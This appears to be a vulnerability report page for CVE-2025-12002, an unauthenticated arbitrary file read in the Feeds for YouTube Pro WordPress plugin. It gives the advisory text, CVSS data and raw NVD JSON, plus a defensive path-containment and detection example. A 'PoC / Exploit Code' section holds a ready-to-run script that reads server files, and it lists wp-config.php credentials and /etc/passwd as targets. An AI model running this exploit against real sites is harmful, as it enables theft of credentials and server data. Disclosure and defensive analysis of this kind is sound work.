Security Vulnerability Report
CVE-2025-12002 CVSS 5.9 MEDIUM

CVE-2025-12002

Published: 2026-01-17 03:16:03
Last Modified: 2026-04-15 00:35:42

Description

The Feeds for YouTube Pro plugin for WordPress is vulnerable to arbitrary file read in all versions up to, and including, 2.6.0 via the 'sby_check_wp_submit' AJAX action. This is due to insufficient sanitization of user-supplied data and the use of that data in a file operation. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information, granted the 'Save Featured Images' setting is enabled and 'Disable WP Posts' is disabled. Note: This vulnerability only affects the Pro version of Feeds for YouTube.
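The description above names the root cause (user-supplied data reaching a file operation without sanitization, CWE-22) but not what a correct check looks like or how to spot the attack on the wire. The following is an added example, not code from the plugin or from the advisory: `resolve_within`/`read_upload` show the containment check a file-serving handler should perform, and `flag_ajax_request` inspects an `admin-ajax.php` POST body for traversal-style values sent to the `sby_check_wp_submit` action. All function names, the sample directory layout and the request bodies are constructed here; the advisory publishes only the action name, so the detection inspects every parameter rather than assuming which one carries the path.

```python
import os
import re
import tempfile
from typing import Dict, List, Optional
from urllib.parse import parse_qs

# Added example, not plugin code. Function and parameter names are hypothetical;
# the advisory names only the AJAX action ('sby_check_wp_submit'), not the
# parameter that reaches the file operation.

WIN_DRIVE = re.compile(r"^[a-zA-Z]:[\\/]")
# Checked on the URL-decoded value; a literal '%2e' survives decoding only when
# the sender double-encoded it, which is itself worth flagging.
TRAVERSAL_MARKERS = ("../", "..\\", "%2e", "\x00")


def resolve_within(base_dir: str, user_path: str) -> Optional[str]:
    """Resolve user_path under base_dir; return None if it would escape.

    The fix for a CWE-22 file read is to (1) refuse absolute paths instead of
    joining them (os.path.join discards base_dir when the right operand is
    absolute), (2) canonicalise with realpath so '..' segments and symlinks
    are resolved, and (3) do a separator-aware prefix test against the
    canonical base so 'uploads-evil' does not pass for 'uploads'.
    """
    base = os.path.realpath(base_dir)
    if os.path.isabs(user_path) or user_path.startswith(("/", "\\")) or WIN_DRIVE.match(user_path):
        return None
    candidate = os.path.realpath(os.path.join(base, user_path))
    if candidate != base and candidate.startswith(base + os.sep):
        return candidate
    return None


def read_upload(base_dir: str, user_path: str) -> Optional[bytes]:
    """Hardened counterpart of an unchecked open()/file_get_contents() on user input."""
    target = resolve_within(base_dir, user_path)
    if target is None or not os.path.isfile(target):
        return None
    with open(target, "rb") as fh:
        return fh.read()


def flag_ajax_request(body: str) -> List[str]:
    """Names of parameters in an admin-ajax.php POST body that carry a
    traversal-style or absolute path for the sby_check_wp_submit action.
    Other actions return [] so the rule stays quiet on normal WordPress traffic."""
    params = parse_qs(body, keep_blank_values=True)
    if params.get("action") != ["sby_check_wp_submit"]:
        return []
    hits = []
    for name, values in params.items():
        for value in values:
            low = value.lower()
            if os.path.isabs(value) or WIN_DRIVE.match(value) or any(m in low for m in TRAVERSAL_MARKERS):
                hits.append(name)
                break
    return hits


def containment_demo() -> Dict[str, Optional[bytes]]:
    """Build a throwaway uploads dir beside a fake wp-config.php (constructed
    data) and try the kinds of paths an attacker would send. Returns what each
    attempt yielded: file bytes when served, None when refused."""
    with tempfile.TemporaryDirectory() as root:
        uploads = os.path.join(root, "uploads")
        os.makedirs(uploads)
        with open(os.path.join(uploads, "thumb.jpg"), "wb") as fh:
            fh.write(b"\xff\xd8constructed-thumbnail")
        with open(os.path.join(root, "wp-config.php"), "w") as fh:
            fh.write("<?php define('DB_PASSWORD', 'constructed');")
        return {
            "thumb.jpg": read_upload(uploads, "thumb.jpg"),
            "../wp-config.php": read_upload(uploads, "../wp-config.php"),
            "sub/../../wp-config.php": read_upload(uploads, "sub/../../wp-config.php"),
            "/etc/passwd": read_upload(uploads, "/etc/passwd"),
            # Absolute paths are refused as a policy even when they point inside.
            "abs-upload": read_upload(uploads, os.path.join(uploads, "thumb.jpg")),
        }


if __name__ == "__main__":
    for path, data in containment_demo().items():
        print(f"{path!r:28} -> {'served ' + str(len(data)) + ' bytes' if data else 'refused'}")
    # Constructed request bodies: a traversal attempt, a benign call to the same
    # action, and a traversal-looking value sent to an unrelated action.
    for body in ("action=sby_check_wp_submit&task=customize_feed&file=../../wp-config.php",
                 "action=sby_check_wp_submit&task=customize_feed&file=thumb.jpg",
                 "action=heartbeat&data=../../etc/passwd"):
        print(flag_ajax_request(body), body)
```

The realpath-then-prefix pattern is the portable form of the check; a PHP handler would do the same with `realpath()` and `wp_upload_dir()['basedir']`. Note that `flag_ajax_request` only sees request bodies, so it belongs in a WAF or a proxy that logs POST parameters; a plain access log records neither the action nor the path.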

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No CPE configuration data is available for this entry in NVD. Affected range, taken from the description:

Feeds for YouTube Pro <= 2.6.0 (Pro version only; the free Feeds for YouTube plugin is not affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-12002 PoC - Feeds for YouTube Pro Arbitrary File Read
# Target: WordPress site with Feeds for YouTube Pro plugin <= 2.6.0
# Prerequisites: 'Save Featured Images' enabled, 'Disable WP Posts' disabled
# Note: the advisory names only the AJAX action; the 'task' and 'file' parameter
# names used below are this PoC's own and are not confirmed by the published references.


def exploit_file_read(target_url, file_path):
    """
    Exploit the arbitrary file read vulnerability via the sby_check_wp_submit AJAX action.

    Args:
        target_url: Base URL of the WordPress site
        file_path: Path to the file to read (e.g., /etc/passwd, wp-config.php)

    Returns:
        Content of the requested file, or an error string
    """
    # Construct the AJAX endpoint
    ajax_url = f"{target_url}/wp-admin/admin-ajax.php"

    # Prepare the malicious request
    # The vulnerability is in the sby_check_wp_submit action
    # The file parameter is not properly sanitized, allowing path traversal
    data = {
        'action': 'sby_check_wp_submit',
        'task': 'customize_feed',
        'file': file_path,  # Vulnerable parameter - no sanitization
    }

    try:
        # Send the exploit request
        response = requests.post(ajax_url, data=data, timeout=30)
        if response.status_code == 200:
            return response.text
        return f"Error: HTTP {response.status_code}"
    except requests.exceptions.RequestException as e:
        return f"Request failed: {str(e)}"


def main():
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-12002.py <target_url> <file_path>")
        print("Example: python cve-2025-12002.py http://example.com /etc/passwd")
        sys.exit(1)

    target_url = sys.argv[1].rstrip('/')
    file_path = sys.argv[2]

    print(f"[*] Targeting: {target_url}")
    print(f"[*] Attempting to read: {file_path}")
    print("-" * 50)

    content = exploit_file_read(target_url, file_path)
    print(content)


if __name__ == "__main__":
    main()

# Common target files for exploitation:
# - /etc/passwd (Linux) or C:\Windows\boot.ini (Windows)
# - wp-config.php (WordPress configuration with DB credentials)
# - ../wp-config.php (path traversal variant)
# - /var/www/html/wp-config.php (absolute path variant)
```

References

- https://plugins.trac.wordpress.org/browser/feeds-for-youtube/trunk/inc/Services/AdminAjaxService.php#L25
- https://plugins.trac.wordpress.org/browser/feeds-for-youtube/trunk/inc/Services/AdminAjaxService.php#L339
- https://plugins.trac.wordpress.org/browser/feeds-for-youtube/trunk/inc/Services/AdminAjaxService.php#L383
- https://plugins.trac.wordpress.org/browser/feeds-for-youtube/trunk/inc/sby-functions.php#L1038
- https://plugins.trac.wordpress.org/browser/feeds-for-youtube/trunk/inc/sby-functions.php#L1047
- https://smashballoon.com/youtube-feed/
- https://www.wordfence.com/threat-intel/vulnerabilities/id/e9f31ec5-c376-45b1-9ffe-35c80b89b60d?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-12002",
    "sourceIdentifier": "security@wordfence.com",
    "published": "2026-01-17T03:16:02.840",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Feeds for YouTube Pro plugin for WordPress is vulnerable to arbitrary file read in all versions up to, and including, 2.6.0 via the 'sby_check_wp_submit' AJAX action. This is due to insufficient sanitization of user-supplied data and the use of that data in a file operation. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information, granted the 'Save Featured Images' setting is enabled and 'Disable WP Posts' is disabled. Note: This vulnerability only affects the Pro version of Feeds for YouTube."
      },
      {
        "lang": "es",
        "value": "The Feeds for YouTube Pro plugin for WordPress is vulnerable to arbitrary file read in all versions up to and including 2.6.0, via the 'sby_check_wp_submit' AJAX action. This is due to insufficient sanitization of user-supplied data and the use of that data in a file operation. This allows unauthenticated attackers to read the contents of arbitrary files on the server, which may contain sensitive information, provided the 'Save Featured Images' setting is enabled and 'Disable WP Posts' is disabled. Note: This vulnerability only affects the Pro version of Feeds for YouTube."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "security@wordfence.com",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 5.9,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.2,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "security@wordfence.com",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-22"}
        ]
      }
    ],
    "references": [
      {"url": "https://plugins.trac.wordpress.org/browser/feeds-for-youtube/trunk/inc/Services/AdminAjaxService.php#L25", "source": "security@wordfence.com"},
      {"url": "https://plugins.trac.wordpress.org/browser/feeds-for-youtube/trunk/inc/Services/AdminAjaxService.php#L339", "source": "security@wordfence.com"},
      {"url": "https://plugins.trac.wordpress.org/browser/feeds-for-youtube/trunk/inc/Services/AdminAjaxService.php#L383", "source": "security@wordfence.com"},
      {"url": "https://plugins.trac.wordpress.org/browser/feeds-for-youtube/trunk/inc/sby-functions.php#L1038", "source": "security@wordfence.com"},
      {"url": "https://plugins.trac.wordpress.org/browser/feeds-for-youtube/trunk/inc/sby-functions.php#L1047", "source": "security@wordfence.com"},
      {"url": "https://smashballoon.com/youtube-feed/", "source": "security@wordfence.com"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e9f31ec5-c376-45b1-9ffe-35c80b89b60d?source=cve", "source": "security@wordfence.com"}
    ]
  }
}
```